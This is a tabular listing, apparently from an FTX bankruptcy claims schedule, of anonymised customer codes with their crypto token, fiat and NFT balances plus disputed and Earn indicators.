| 07400512 | | AUD[0.00], BTC[0], CAD[0.00], DOGE[0.36945000], ETH[0], ETHW[0.01381621], EUR[0.00], GBP[0.00], LINK[0], MATIC[6.27495000], NFT (378037527955071699/Junkmail#439)[1], PAXG[0.00000001], SOL[.004415], SUSHI[0], USD[-1.36], USDT[0] | | |
| 07400522 | | CUSDT[2], DOGE[4071.9687908], LINK[43.69445189], USD[300.00] | | |
| 07400532 | | BAT[2], BRZ[7], CUSDT[4], DOGE[1], GRT[1], LINK[1], TRX[1], USD[0.01] | | |
| 07400535 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07400536 | | BAT[2], BRZ[3], DOGE[4], TRX[1], USD[0.00], USDT[1] | | |
| 07400546 | | BF_POINT[100], CUSDT[1], SOL[.0001054], TRX[4814.40607925], USD[0.00] | Yes | |
| 07400547 | | CUSDT[1], ETH[.01439837], ETHW[.01439837], USD[0.00] | | |
| 07400548 | | USD[0.00], USDT[0] | | |
| 07400551 | | BAT[1.0165555], BRZ[2], CUSDT[1.22848452], DOGE[.00852214], ETH[.07773298], ETHW[.07676854], TRX[12793.28444301], USD[0.67], USDT[2.20836344] | Yes | |
| 07400557 | | USD[0.02], USDT[0] | Yes | |
| 07400559 | | CUSDT[1], DOGE[0], GRT[0], SUSHI[0], TRX[0], USD[0.01], USDT[0] | | |
| 07400566 | | USD[5.76], USDT[.9103538] | | |
| 07400568 | | BRZ[1], DOGE[5126.14567528], USD[0.00] | | |
| 07400577 | | CUSDT[1], DOGE[9.89253582], USD[0.01], USDT[.09013465] | | |
| 07400581 | | USD[0.00], USDT[1] | | |
| 07400585 | | SOL[2.53632491] | | |
| 07400595 | | ETH[.00000001], ETHW[0], USD[0.78] | Yes | |
| 07400597 | | USD[0.30], USDT[1] | | |
| 07400601 | | BTC[0], DOGE[0], ETHW[1.13471362], LINK[0], MATIC[0], NFT (447548235468809821/Entrance Voucher #2816)[1], SHIB[0], SOL[0.00000001], UNI[0], USD[0.00] | Yes | |
| 07400605 | | BRZ[1], CUSDT[7], DOGE[327.856102], ETH[.08138087], ETHW[.08037812], GRT[13.43119019], SUSHI[8.46955797], USD[0.11] | Yes | |
| 07400612 | | NFT (406155620806304358/FTX - Off The Grid Miami #4696)[1], NFT (560506394341101164/Coachella x FTX Weekend 1 #20873)[1], NFT (575444325808710606/Saudi Arabia Ticket Stub #213)[1], SOL[.00902], USD[0.00] | | |
| 07400614 | | CUSDT[5], DOGE[17768.06169975], GRT[1], TRX[2], USD[2.94], USDT[1] | | |
| 07400627 | | USDT[879.733] | | |
| 07400630 | | TRX[2], USD[0.00] | | |
| 07400631 | | CUSDT[1], DOGE[99.05235031], USD[30.00] | | |
| 07400634 | | BRZ[1], GRT[1], TRX[2], USD[0.01] | | |
| 07400636 | | CUSDT[7], DOGE[3], TRX[452.05232921], USD[2.54] | Yes | |
| 07400643 | | BTC[.0913332], DOGE[3554.724], ETH[5.583576], ETHW[5.583576], USD[0.98] | | |
| 07400649 | | NEAR[508.4], SOL[.0032], USD[0.00] | | |
| 07400652 | | ETHW[.05149666], NFT (478028013771972791/FTX x CAL: The Decision #142)[1], SHIB[1.00000001], USD[0.00] | Yes | |
| 07400655 | | TRX[.1] | | |
| 07400659 | | SOL[0], USD[0.00], USDT[0.00000433] | | |
| 07400671 | | USD[0.40] | | |
| 07400675 | | ETHW[.01460971], USD[19.10] | | |
| 07400679 | | BAT[1], DOGE[1], GRT[173.42083058], USD[0.34], USDT[0.00000001] | | |
| 07400682 | | CUSDT[1], USD[0.00] | | |
| 07400687 | | BTC[0], PAXG[0], USD[1.47] | | |
| 07400688 | | USD[0.96] | | |
| 07400690 | | USD[0.41] | | |
| 07400692 | | BRZ[1], CUSDT[2], DOGE[1793.49396299], TRX[1], USD[0.00] | | |
| 07400701 | | CUSDT[1], DOGE[438.97315748], TRX[41.23717659], USD[0.00] | Yes | |
| 07400706 | | ALGO[0.37999263], BF_POINT[100], BTC[0], CUSDT[0], DOGE[0], ETH[0.00038827], ETHW[0], MATIC[14.48560491], NEAR[202.8787037], NFT (383497862376386932/Australia Ticket Stub #185)[1], NFT (469235819582190506/Rox #158)[1], NFT (498446264763318710/SOLYETIS #4781)[1], NFT (531147071278963426/SOLYETIS #3431)[1], SHIB[104900942.85852997], SOL[48.37098626], SUSHI[0], TRX[0], UNI[0], USDt-1969.88], USDT[0] | Yes | |
| 07400712 | | CUSDT[1], DOGE[1.41717965], USD[0.00], USDT[0] | | |
| 07400717 | | CUSDT[5], DOGE[1], USD[0.01], USDT[0] | | |
| 07400723 | | ETH[.591], ETHW[.591], SUSHI[.301], USD[0.39] | | |
| 07400730 | | TRX[1], USD[0.00] | Yes | |
| 07400731 | | BRZ[1], CUSDT[5], DAI[0], DOGE[13.83752785], ETH[0], NFT (428544621631549595/Esteban Heath #7)[1], SGD[0.00], SHIB[7], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[1.05130929] | Yes | |
| 07400735 | | BTC[0], CUSDT[1], TRX[108.08620959], USD[0.00] | | |
| 07400738 | | CUSDT[1], SHIB[4], TRX[2], USD[0.01] | Yes | |
| 07400740 | | SHIB[708148.46879928], USD[0.81], USDT[0] | Yes | |
| 07400748 | | DOGE[3], SOL[.0000371], USD[0.00], USDT[0.00515392] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07400759 | | BRZ[0], DOGE[0], ETH[0], ETHW[0], NFT (306675443481447890/Entrance Voucher #3826)[1], SHIB[44.06324018], TRX[0], USD[0.00] | Yes | |
| 07400761 | | BAT[42.30515868], CUSDT[2], DOGE[2], GRT[10.75408287], TRX[912.3083836], USD[0.00] | | |
| 07400766 | | SHIB[1], USD[0.01], USDT[0] | Yes | |
| 07400767 | | DOGE[16.66848995], USD[0.00], USDT[0] | | |
| 07400770 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07400775 | | GRT[.816], USD[0.00] | | |
| 07400779 | | BTC[.00003366], ETH[.000238], ETHW[.000238], LINK[.0874], SOL[.00575], SUSHI[.474], USD[3575.34] | | |
| 07400783 | | CUSDT[1], DAI[.00000301], DOGE[0] | | |
| 07400784 | | DOGE[24.81337927], USD[0.00], USDT[0] | | |
| 07400788 | | BRZ[2], BTC[.00901453], CUSDT[5], DOGE[7], ETH[.1935272], ETHW[.1935272], TRX[2], USD[0.00] | | |
| 07400796 | | LTC[.0000028], MATIC[.0003063], SHIB[125.12514898], USD[0.00] | Yes | |
| 07400803 | | BRZ[1], CUSDT[2], DOGE[1], SHIB[3802415.59380634], TRX[3], USD[0.00], USDT[0.00000001] | Yes | |
| 07400805 | | BRZ[3], CUSDT[6.00137897], DOGE[16.08808193], LINK[0], SHIB[4452718.78249528], SOL[0], TRX[1], USD[0.01] | Yes | |
| 07400806 | | CUSDT[2], DOGE[1099.79258175], TRX[1.00008624], USD[0.00] | | |
| 07400807 | | BRZ[1], BTC[.00063849], CUSDT[16], DOGE[418.06401621], TRX[4], USD[19.00] | | |
| 07400813 | | CUSDT[5], DOGE[9567.9533676], TRX[1], USD[4.80] | | |
| 07400815 | | BRZ[1], USD[0.00] | | |
| 07400816 | | BTC[0], USD[0.00], USDT[0] | | |
| 07400820 | | MATIC[0], USD[0.00] | Yes | |
| 07400822 | | ETH[2.35764], ETHW[2.35764], SOL[50.26749408], USD[0.00] | | |
| 07400825 | | CUSDT[3], TRX[281.76119228], USD[3.65] | | |
| 07400826 | | USD[0.00] | | |
| 07400834 | | BTC[0], DOGE[0], LTC[0], USD[0.26] | Yes | |
| 07400838 | | BRZ[3], CUSDT[7.58727072], DOGE[307.52151663], GRT[1], TRX[1], USD[0.99], USDT[1] | | |
| 07400843 | | SHIB[2837767.08432327], USD[13343.95] | Yes | |
| 07400844 | | BAT[3], BRZ[3], DOGE[10885.06068364], TRX[2], USD[0.00] | | |
| 07400846 | | BTC[0.00001821], USDT[.8804742] | | |
| 07400848 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07400853 | | BTC[0], ETH[0], TRX[.00769633], USD[0.00], YFI[0] | | |
| 07400859 | | TRX[1], USD[0.00] | | |
| 07400863 | | CUSDT[1], DOGE[46.85904167], USD[0.01] | | |
| 07400878 | | BTC[0], ETH[0.00000001], LTC[.00846503], NFT (330925045206577795/Ayyo and the Artisans)[1], NFT (396128207814335435/SKULL #735)[1], NFT (402483138106671904/Have a Happy Halloween)[1], NFT (532535808754465841/SKULL Staking)[1], NFT (533745764306005105/Bannerisms Prototype)[1], NFT (550859421592859439/Party Pixels)[1], SOL[0], USD[0.00] | | |
| 07400881 | | DOGE[962.63288031], ETH[.03586922], ETHW[.03586922], USD[0.00] | | |
| 07400882 | | BTC[.00052229], CUSDT[26], DOGE[2], ETH[.00664799], ETHW[.00664799], TRX[4], USD[0.00] | | |
| 07400883 | | DOGE[12.9976292], TRX[1], USD[0.11] | | |
| 07400884 | | NFT (346873307138160949/Entrance Voucher #15418)[1], USD[0.00], USDT[.760466] | | |
| 07400899 | | BAT[2], BRZ[1], CUSDT[4], DOGE[3], TRX[4], USD[0.00], USDT[1] | | |
| 07400900 | | BTC[0], ETHW[0.00003704], USD[104.04], USDT[0] | | |
| 07400901 | | BAT[1.0165555], BRZ[2], BTC[0], CUSDT[18], DOGE[10.07653039], LINK[0], MATIC[0], SHIB[59], SOL[0], TRX[11], UNI[0], USD[627.03], USDT[0] | Yes | |
| 07400904 | | USD[0.00] | | |
| 07400905 | | DOGE[357.04836117], USD[0.00] | | |
| 07400907 | | BAT[1], CUSDT[1], ETH[0], USD[0.01] | | |
| 07400917 | | CUSDT[3], SOL[0], USD[0.01] | Yes | |
| 07400919 | | DOGE[1], ETH[.02556086], ETHW[.02556086], USD[0.00] | | |
| 07400921 | | BAT[1.0165555], BRZ[1], CUSDT[2], DOGE[3], USD[0.00], USDT[1.09915919] | Yes | |
| 07400922 | | BCH[7.90728564], BRZ[2], BTC[.00215553], CUSDT[5], DOGE[358.63720769], ETH[.03933348], ETHW[.03933348], SUSHI[3.56153538], TRX[2], UNI[3.16033749], USD[0.00] | | |
| 07400925 | | DOGE[1888.72990662], USD[0.00] | | |
| 07400931 | | BAT[0], BTC[0], ETH[0], LINK[0], SHIB[1], SOL[0], TRX[0], USD[0.00] | | |
| 07400933 | | BRZ[2], DOGE[1], TRX[0], USD[0.01], USDT[1] | | |
| 07400934 | | SOL[0] | | |
| 07400935 | | BAT[0], BTC[0], USD[0.00] | Yes | |
| 07400938 | | BTC[.00005626], CUSDT[5], SHIB[1], USD[0.02] | Yes | |
| 07400940 | | CUSDT[1], DOGE[12], ETH[0], USD[0.00] | | |
| 07400941 | | USD[5.00] | | |
| 07400950 | | DOGE[680.35163633], USD[0.01] | Yes | |
| 07400951 | | LTC[1.50136469], TRX[1], USD[0.00] | | |
| 07400953 | | USD[0.01] | Yes | |
| 07400954 | | ETH[.0002], ETHW[.0002], LTC[.0017445], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07400957 | | DOGE[1], GRT[.0002219], UNI[0] | | |
| 07400958 | | BRZ[1], CUSDT[3], DOGE[.00803372], ETH[0.00077616], ETHW[0.00076523], TRX[2], USD[0.09] | Yes | |
| 07400963 | | BTC[.00040296], CUSDT[1785.06093602], DAI[.89999985], DOGE[6016.33300984], ETH[.01732577], ETHW[.01732577], GRT[12.13867759], LINK[.8986423], LTC[.44373632], TRX[901.46716294], USD[0.00] | | |
| 07400968 | | AAVE[.38437784], BAT[368.68436529], BCH[.99422336], BRZ[4], CUSDT[21], DOGE[1493.38451623], GRT[83.79035463], LINK[2.36941208], LTC[.76884975], SHIB[3673922.80985812], SOL[5.08600768], SUSHI[51.99087947], TRX[513.34495664], UNI[5.34845967], USD[2478.09], USDT[1.09648447] | Yes | |
| 07400970 | | AVAX[.03628], BTC[.00013273], LTC[.0042895], SOL[.004], SUSHI[.076425], TRX[.593], USD[0.01], USDT[0] | | |
| 07400972 | | DOGE[20338.21250862], TRX[1], USD[0.00] | | |
| 07400982 | Contingent, Disputed | CUSDT[4], DOGE[833.86045734], TRX[2], USD[0.00] | | |
| 07400983 | | ETH[0], SUSHI[0], USD[0.00] | | |
| 07400990 | | BTC[.00002025], DOGE[.966], LINK[0.09152783], SHIB[83001], USD[0.00] | | |
| 07400992 | | SOL[0], TRX[.000002], USDT[1.68856966] | | |
| 07401007 | | BTC[0.00006818], ETH[.00000107], ETHW[.00000107], MATIC[.60139881], SOL[.00834749], TRX[12.31270170], USD[0.00], YFI[.0000408] | | |
| 07401013 | | CUSDT[5], DOGE[.06069901], SUSHI[2.87798074], TRX[7768.88881041], USD[0.00] | Yes | |
| 07401014 | | BAT[.00002662], BRZ[.00009164], DOGE[3], GRT[0], TRX[1], USD[0.00], USDT[0.00096331] | Yes | |
| 07401018 | | BAT[1], BRZ[1], CUSDT[6], SUSHI[62.85664476], TRX[4], USD[0.00] | | |
| 07401021 | | NFT (475992295885265904/FTX - Off The Grid Miami #7485)[1] | | |
| 07401024 | | CUSDT[10], DOGE[328.37361727], TRX[2], USD[0.00] | Yes | |
| 07401028 | | BRZ[1], DOGE[1], ETH[0], ETHW[0.00667756], GRT[1.00313735], MATIC[0], USD[0.01], USDT[0.00036831] | Yes | |
| 07401031 | | DOGE[2], TRX[1], USD[0.00], USDT[0.00000689] | | |
| 07401038 | | BAT[.00001238], DOGE[1], ETH[0] | | |
| 07401039 | | CUSDT[1], DOGE[35.30621122] | | |
| 07401042 | | BRZ[4], CUSDT[7], ETH[.3892103], ETHW[.3892103], GRT[1], LTC[1.53546524], SOL[45.74249459], TRX[2.85488732], USD[0.44], USDT[237.79236581] | | |
| 07401047 | | DOGE[252.35707056], TRX[1], USD[0.00] | Yes | |
| 07401060 | | BTC[.001] | | |
| 07401063 | | USD[0.00], USDT[0] | | |
| 07401068 | | BTC[7.29259], ETH[28.63898701], ETHW[28.63898701], SOL[3186.634221], USD[99517.42] | | |
| 07401069 | | NFT (538937111385778165/Australia Ticket Stub #1265)[1], USD[0.01] | | |
| 07401072 | | BRZ[2], CUSDT[8], DOGE[137.51424991], ETH[.0104958], ETHW[.0104958], TRX[7], USD[1.98] | | |
| 07401074 | | BRZ[1], CUSDT[13], DOGE[8.51115505], ETH[.00000062], ETHW[.00000062], SOL[.00008314], SUSHI[38.40733244], TRX[2], USD[0.01] | Yes | |
| 07401076 | | USD[0.08], USDT[0.01664799] | | |
| 07401078 | | USD[0.91] | | |
| 07401079 | | DOGE[0], USD[0.00] | Yes | |
| 07401086 | | BTC[.0012987], DOGE[.984], ETH[.000065], ETHW[.000065], GRT[.02], LINK[.0716], MATIC[200], SOL[.06], SUSHI[.22], TRX[.988086], USD[3020.36], USDT[3120.10645441] | | |
| 07401088 | | ETH[.00000001] | | |
| 07401091 | | BTC[.0000826], USD[0.00], USDT[0] | | |
| 07401092 | | USD[0.00] | | |
| 07401097 | | BCH[0], BTC[0], CUSDT[0], DAI[0], ETH[0], GBP[0.00], LTC[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07401100 | | BAT[1.01160545], BRZ[5.01909434], BTC[1.11429455], CUSDT[14], DOGE[13.24291985], ETH[1.21838241], ETHW[1.21838241], NFT (458273197678918118/Resilience #4)[1], NFT (472852105790559963/Raydium x ME: Holiday Drop 2021)[1], NFT (545879780816505278/Ballpark Bobblers 2022 - ID: CEA86937)[1], NFT (573692822395027701/Serum Surfers X Crypto Bahamas #6)[1], SHIB[14], SOL[44.14576959], TRX[10], USD[0.00] | Yes | |
| 07401101 | | BRZ[4], CUSDT[5], DOGE[2], ETH[0], GRT[1.00498957], TRX[0], USD[0.14], USDT[0] | Yes | |
| 07401103 | | BTC[0], MATIC[0], USD[0.00], USDT[0.00008461] | | |
| 07401106 | | BTC[0.19560500], USD[0.97] | | |
| 07401110 | | BAT[519.24836469], CUSDT[1], DOGE[1], SOL[0], TRX[1], UNI[0], USD[0.00], USDT[0.00044699] | | |
| 07401112 | | USD[0.01], USDT[0] | | |
| 07401114 | | BAT[0], CUSDT[9], DOGE[89.23526557], SOL[0], SUSHI[0], UNI[0], USD[0.01], USDT[0] | | |
| 07401115 | | ETH[.022028], ETHW[.022028] | | |
| 07401118 | | CUSDT[2352.18001052], DOGE[1437.37974916], ETH[.0690164], ETHW[.0690164], LTC[.59697494], USD[111.59] | | |
| 07401124 | | BTC[.0121731], CUSDT[1], DOGE[1943.18692189], TRX[1], USD[0.00] | | |
| 07401128 | | BCH[.342584], BTC[.00807488], CUSDT[1], DOGE[1595.90154715], GRT[1], TRX[4], USD[0.00] | | |
| 07401130 | | BTC[0], DOGE[0], USD[40.22] | | |
| 07401136 | | CUSDT[1], DOGE[38.2315045], USD[0.00] | | |
| 07401142 | | SUSHI[.4995], USD[0.00], USDT[.02980474] | | |
| 07401143 | | LTC[.10868349] | | |
| 07401149 | | AAVE[.17073844], BAT[57.70227778], BRZ[119.24602371], CUSDT[1521.09771108], GRT[103.46434913], KSHIB[3288.79732903], LTC[.58213267], MATIC[37.02192316], SHIB[4028162.09023943], SOL[1.9301738], TRX[508.9637245], UNI[15.83867066], USD[157.27] | Yes | |
| 07401150 | | BAT[600.55241078], BRZ[1], CUSDT[4], DOGE[1], TRX[2872.81642565], USD[0.00] | | |
| 07401152 | | BRZ[1], CUSDT[3], DOGE[2336.50712951], TRX[3], USD[0.00], USDT[1.09505353] | Yes | |
| 07401154 | | BRZ[3], CUSDT[1], DOGE[2], SHIB[11539976.90214757], SOL[1.12149264], TRX[1], USD[0.00] | Yes | |
| 07401156 | | BRZ[3], CUSDT[1], DOGE[.00914891], USD[0.01] | Yes | |
| 07401159 | | BTC[.04321455], CUSDT[3], DOGE[1831.85441312], ETH[.37758657], ETHW[.37742442], LTC[1.16551799], TRX[3], USD[533.71], USDT[109.95389752] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07401163 | | ETH[0], USD[0.00], USDT[0.00000010] | | |
| 07401172 | | BAT[0], BCH[0], BTC[0], CUSDT[0], DOGE[0.93577186], GRT[0], LINK[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07401174 | | BRZ[0], GRT[0], TRX[0], USD[0.01] | | |
| 07401175 | | AAVE[0], BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], ETHW[0], EUR[0.00], KSHIB[0], LTC[0], PAXG[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00012063], YFI[0] | | |
| 07401177 | | BAT[57.10181662], CUSDT[2], DOGE[1790.20039924], TRX[1808.4048377], USD[0.00], USDT[0] | Yes | |
| 07401183 | | NFT (2896432363128216031/Warriors 75th Anniversary Icon Edition Diamond #314)[1] | | |
| 07401188 | | BTC[.00048155], DOGE[2], TRX[466.16239083], USD[0.00] | | |
| 07401191 | | CUSDT[5], DOGE[3751.44344138], TRX[926.86608754], USD[0.00] | | |
| 07401192 | | CUSDT[5], DOGE[2875.34682594], SOL[1.67990416], SUSHI[0], TRX[209.62477067], USD[0.00] | Yes | |
| 07401213 | | USD[0.00] | | |
| 07401221 | | BRZ[1], CUSDT[8], DOGE[4.04766048], TRX[3], USD[0.00] | Yes | |
| 07401222 | | BTC[0], LTC[0], SOL[0], USD[0.00] | | |
| 07401223 | | DOGE[1], USD[0.00] | | |
| 07401232 | | BAT[0], DOGE[0], ETHW[1.06184891], GRT[.00000001], LINK[0], MKR[0], SHIB[216.76186501], TRX[0], USD[1094.08], USDT[9.98766969] | Yes | |
| 07401237 | | SUSHI[24.905], USDT[0] | | |
| 07401259 | | AAVE[0], BAT[0], BCH[0], BRZ[0], BTC[0.00000002], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], PAXG[0], SHIB[24], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07401261 | | USD[10.77] | | |
| 07401262 | | BRZ[1], SOL[0], SUSHI[20.48608020], TRX[2], USD[0.00] | Yes | |
| 07401265 | | BAT[644.62495123], BRZ[2], CUSDT[7], DOGE[1949.01435101], ETH[0], ETHW[0], TRX[6], USD[0.00], USDT[0.00001842] | Yes | |
| 07401268 | | BTC[0], USD[0.00] | | |
| 07401269 | | SHIB[2], USD[0.00] | Yes | |
| 07401280 | | USD[0.00] | | |
| 07401289 | | ETH[.00010497], ETHW[.00010497], USD[0.13], USDT[0.00263149] | | |
| 07401290 | | BTC[.00249896], CUSDT[8], DOGE[923.79999779], ETH[.03728927], ETHW[.03728927], GRT[19.52866584], MATIC[5.64858646], SHIB[1061409.27868919], SOL[1.90021982], TRX[67.91539023], USD[5.58] | | |
| 07401291 | | DOGE[0.00367775], USD[0.00] | Yes | |
| 07401298 | | BRZ[1], DOGE[0], USD[0.00] | | |
| 07401300 | | DOGE[352.44184287], USD[0.00] | | |
| 07401301 | | BTC[.00005463], CUSDT[2.00005989], DOGE[108.60130425], TRX[430.55600443], USD[0.01] | Yes | |
| 07401303 | | BTC[0.00009080], ETH[.00161251], ETHW[.00161251], MATIC[.00358528], USD[25.69] | | |
| 07401308 | | USD[0.02] | | |
| 07401310 | | SOL[3.58674978], TRX[1], USD[0.00] | Yes | |
| 07401311 | | BAT[1], BRZ[1], DOGE[1.00000149], ETH[.04217735], ETHW[.04217735], USD[43.82] | | |
| 07401312 | | CUSDT[1], USD[0.01] | | |
| 07401313 | | CUSDT[1], USDT[0] | | |
| 07401322 | | BTC[0], SOL[0] | | |
| 07401326 | | AVAX[0], BCH[0.02954506], BTC[0], CUSDT[20], DOGE[6.00038359], ETH[.00000002], ETHW[.00000002], KSHIB[0], NFT (41490256150382751B/Entrance Voucher #3910)[1], SHIB[197.2421834], SUSHI[0], TRX[1], USD[0.00], USDT[0.00021160] | Yes | |
| 07401327 | | DOGE[0], USD[0.00] | | |
| 07401332 | | USD[0.00], USDT[0.00030552] | | |
| 07401338 | | USD[391.00] | | |
| 07401344 | | BTC[0.00004014], USD[0.00], USDT[0.00000001] | Yes | |
| 07401355 | | ETH[.15657726], ETHW[.15590467] | Yes | |
| 07401357 | | CUSDT[5], TRX[1], USD[0.00] | | |
| 07401362 | | ETHW[.02931279], NFT (55973193187288728B2/Unicat)[1], USD[0.00] | | |
| 07401366 | | BTC[0], CUSDT[1], DOGE[3], ETH[0], LTC[0], TRX[1.00004706], USD[0.01] | | |
| 07401368 | | CUSDT[1], DOGE[13091.53199428], SOL[10.03876207], TRX[1], USD[0.01], USDT[0] | | |
| 07401371 | | BTC[.0009728], DOGE[8.991], USDT[52.85724600] | | |
| 07401384 | | TRX[2.88361661], USD[0.00] | | |
| 07401385 | | USD[0.01], USDT[0] | | |
| 07401388 | | BRZ[2], CUSDT[3], DOGE[12.50234094], ETH[0], EUR[0.00], LINK[30.37285359], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07401400 | | BCH[0], BRZ[5], BTC[.00000005], ETH[.00000176], GRT[1], SHIB[46], USD[0.00] | Yes | |
| 07401402 | | CUSDT[1], DOGE[3178.99501797], TRX[1], USD[0.00] | | |
| 07401405 | | USD[4.09] | | |
| 07401408 | | BRZ[46.28282856], CUSDT[2586.49393951], DOGE[48.14823335], GRT[5.30530377], LINK[0], SHIB[4281086.20429512], SOL[0], SUSHI[0], TRX[105.97746987], UNI[0], USD[0.02], USDT[3.37372123] | Yes | |
| 07401410 | | SHIB[2], TRX[9.17110883], USD[0.00], USDT[0] | Yes | |
| 07401412 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07401419 | | DOGE[1], SOL[0], USD[30.04] | | |
| 07401426 | | CUSDT[1], DOGE[4.02183096], SOL[21.98327675], TRX[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07401429 | | BAT[1], CUSDT[2], DOGE[10936.4827451], TRX[3751.58782655], USD[0.00] | | |
| 07401432 | | TRX[.000185], USD[0.00], USDT[885.00630226] | Yes | |
| 07401433 | | NFT (322708638636561626/Sigma Shark #5807)[1], NFT (363304743655991481/Sigma Shark #5499)[1], NFT (365058817661899949/Sigma Shark #5579)[1], NFT (385954434920999709/Sigma Shark #4161)[1], NFT (441278773681999293/Sigma Shark #5361)[1], NFT (474062065052087361/Sigma Shark #5350)[1], NFT (516273378176384837/Sigma Shark #5477)[1], NFT (531431344313973095/Sigma Shark #5899)[1], NFT (535512125296499331/Sigma Shark #5231)[1], NFT (548382106737450982/Sigma Shark #5896)[1], NFT (574438531830964789/Sigma Shark #4631)[1] | | |
| 07401434 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07401438 | | CUSDT[517.5288605], DOGE[77.20659717], USD[0.00] | Yes | |
| 07401448 | | BTC[.02684104], DOGE[4], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07401449 | | BAT[1.0165555], BRZ[1], CUSDT[25], SHIB[2], TRX[7], USD[338.90], USDT[1.10839471] | Yes | |
| 07401455 | | BAT[5.956], DOGE[9568], ETH[.016253], ETHW[.6993], SUSHI[1.182], TRX[12007.98], USD[1324.11] | | |
| 07401461 | | BAT[127.0209113], BRZ[262.20838707], CUSDT[31], DOGE[12], GRT[3], SHIB[20635643.88771537], TRX[27], USD[0.38], USDT[3] | | |
| 07401463 | | BTC[.25057978], LINK[92.85690341], LTC[9.74359062], SOL[51.69002716] | | |
| 07401470 | | BTC[.00406335], CUSDT[2099.30394329], DOGE[377.52033342], ETH[.03789291], ETHW[.0374245], GRT[3.22693381], LINK[1.12186382], LTC[.04682226], SUSHI[1.10520934], TRX[200.16660389], UNI[1.12095969], USD[0.00], USDT[13.18967434] | Yes | |
| 07401478 | Contingent, Disputed | SOL[0] | | |
| 07401480 | | CUSDT[6], DOGE[0], TRX[1], USD[0.00] | | |
| 07401481 | | TRX[178.59419933], USD[0.00] | | |
| 07401482 | | BRZ[2], CUSDT[5], DOGE[2], GRT[1], TRX[2], USD[0.00], USDT[1] | | |
| 07401483 | | BRZ[1], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07401493 | | BTC[.0000703], ETH[.01] | | |
| 07401499 | | BTC[.01083257], DOGE[857.54] | | |
| 07401500 | | BTC[.08456936], CUSDT[2], ETH[1.08361119], ETHW[1.08361119], TRX[3], USD[1500.00] | | |
| 07401502 | | DOGE[1], ETH[0], SHIB[1], TRX[2], USD[0.01], USDT[0.00002928] | Yes | |
| 07401508 | | BAT[8.50202918], ETH[0], UNI[0], USD[0.00] | | |
| 07401509 | | BRZ[0], BTC[0], CUSDT[0], DOGE[0], GRT[0], SHIB[1524.3902439], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07401512 | | CUSDT[4], TRX[1], USD[0.00] | | |
| 07401514 | | BTC[0], ETH[0] | | |
| 07401515 | | BTC[0] | | |
| 07401516 | | USD[0.00] | | |
| 07401518 | | BRZ[1], CUSDT[3], TRX[1], USD[0.00] | | |
| 07401520 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07401521 | | USD[0.00] | | |
| 07401524 | | BRZ[3], CUSDT[7], DOGE[2], TRX[9], USD[0.01] | | |
| 07401530 | | ALGO[.006412], BRZ[1], BTC[0], DOGE[1], SHIB[10], USD[30.59], USDT[0.00000001] | Yes | |
| 07401531 | | BTC[.00074508], CUSDT[7], DOGE[618.35410717], ETH[.02193324], ETHW[.02165964], SOL[0], SUSHI[0], TRX[184.38939951], UNI[0], USD[10.93] | Yes | |
| 07401534 | | BRZ[5.07952967], CUSDT[19], DOGE[0], GRT[1.00367791], TRX[0], UNI[0], USD[0.01] | Yes | |
| 07401539 | | DOGE[0], TRX[28.14316051], USD[0.72], USDT[0.00041530] | | |
| 07401543 | | BAT[1.00753341], CUSDT[3], TRX[58.59011015], USD[0.01] | Yes | |
| 07401547 | | DOGE[19.64148448], USD[0.00] | | |
| 07401559 | | USD[10.00] | | |
| 07401563 | | LINK[4.98], USD[0.00] | | |
| 07401564 | | BRZ[.54524621], CUSDT[2], DOGE[1404.65549496], TRX[2], USD[0.87] | | |
| 07401565 | | BTC[0], CUSDT[1], DOGE[47.04182271], TRX[1], USD[0.00] | | |
| 07401568 | | BF_POINT[300], ETH[0], USD[0.00] | | |
| 07401570 | | CUSDT[6.09198047], USD[0.01] | | |
| 07401572 | | USD[0.00] | | |
| 07401582 | | SOL[.0024], USD[0.00] | | |
| 07401593 | | BRZ[1], USD[0.00] | | |
| 07401598 | | AVAX[4.99525], USD[531.78] | | |
| 07401603 | | ETH[0], MKR[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00004900] | | |
| 07401606 | | BTC[.00014314], USD[1.73] | | |
| 07401611 | | ETH[1.53659807], ETHW[1.53659807], USD[0.00], USDT[1] | | |
| 07401612 | | DOGE[28.17371976], USD[0.00] | Yes | |
| 07401617 | | CUSDT[1], DOGE[4358.94793581], GRT[1], TRX[2], USD[0.85] | | |
| 07401618 | | USDT[0] | | |
| 07401622 | | BRZ[1], CUSDT[6], DOGE[3986.46247057], TRX[1036.86035244], USD[0.00] | | |
| 07401627 | | BAT[1.01655549], BRZ[4], CUSDT[11], DOGE[1], TRX[7], USD[0.01] | Yes | |
| 07401631 | | DOGE[3804.0084964], SHIB[9782609.70183602], TRX[1], USD[0.00] | Yes | |
